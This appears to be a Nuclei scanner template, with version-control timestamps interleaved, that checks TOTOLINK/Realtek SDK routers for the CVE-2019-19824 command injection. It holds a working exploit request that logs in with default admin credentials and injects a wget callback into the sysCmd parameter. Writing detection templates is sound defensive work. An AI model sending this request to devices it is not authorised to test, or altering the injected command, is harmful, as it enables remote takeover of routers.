2021-11-14 04:17:27 +00:00
id : CVE-2019-19824
info :
2022-06-20 17:22:56 +00:00
name : TOTOLINK Realtek SD Routers - Remote Command Injection
2021-11-14 04:17:27 +00:00
author : gy741
severity : high
2022-06-20 17:22:56 +00:00
description : |
TOTOLINK Realtek SDK based routers may allow an authenticated attacker to execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.
2021-11-14 04:17:27 +00:00
reference :
- https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html
2021-11-15 11:41:47 +00:00
- https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits
2022-06-10 15:54:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-19824
2022-06-20 17:58:28 +00:00
- https://sploit.tech
2021-11-14 04:17:27 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
cve-id : CVE-2019-19824
cwe-id : CWE-78
2023-04-12 10:55:48 +00:00
epss-score : 0.97266
2021-11-15 11:41:47 +00:00
tags : cve,cve2019,totolink,rce,router
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-11-14 04:17:27 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-14 04:17:27 +00:00
- raw :
- |
POST /boafrm/formSysCmd HTTP/1.1
Host : {{Hostname}}
Authorization : Basic YWRtaW46cGFzc3dvcmQ=
Content-Type : application/x-www-form-urlencoded
2021-11-15 11:41:47 +00:00
submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}}
2021-11-14 04:17:27 +00:00
matchers :
- type : word
2022-02-21 18:33:16 +00:00
part : interactsh_protocol # Confirms the HTTP Interaction
2021-11-14 04:17:27 +00:00
words :
- "http"